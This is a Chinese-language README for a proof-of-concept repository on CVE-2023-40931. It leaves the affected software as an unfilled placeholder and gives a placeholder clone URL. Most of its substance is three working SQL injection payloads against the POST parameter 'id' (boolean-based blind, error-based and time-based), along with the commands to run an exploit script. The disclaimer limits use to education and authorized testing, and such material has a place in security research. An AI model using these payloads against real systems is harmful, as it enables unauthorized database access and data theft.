本仓库包含针对 CVE-2023-40931 的概念验证 (PoC),该漏洞是在 [受影响的软件/系统] 中发现的一个安全漏洞。本仓库的目的仅为教育和研究目的,以演示该漏洞。🛠️
本项目仅用于教育目的和授权测试。滥用此代码可能会导致法律后果。作者不对因使用此代码造成的任何滥用或损害负责。在测试任何系统之前,请务必获得适当授权。🔒
有关更多信息,请参阅官方 CVE 条目:CVE-2023-40931。🔗
克隆仓库:
git clone https://github.com/yourusername/CVE-2023-40931-POC.git
cd CVE-2023-40931-POC
python3 exploit.py
POST 参数 'id' 存在漏洞。以下有效载荷成功利用了该漏洞:
基于布尔的盲注:该有效载荷利用条件语句判断查询的真值,通过布尔逻辑实现数据提取。
action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))基于错误的注入:该有效载荷通过触发特定错误,利用数据库错误消息来提取信息。
action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)基于时间的盲注:该有效载荷使用时间延迟,通过观察服务器的响应时间来推断信息。
action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)这些有效载荷表明该漏洞易受 SQL 注入攻击。请谨慎操作,并在测试前确保已获得适当授权。🔒
按照 exploit.py 文件中的说明执行 PoC。🧑💻
注意:确保已安装所需的依赖项。✅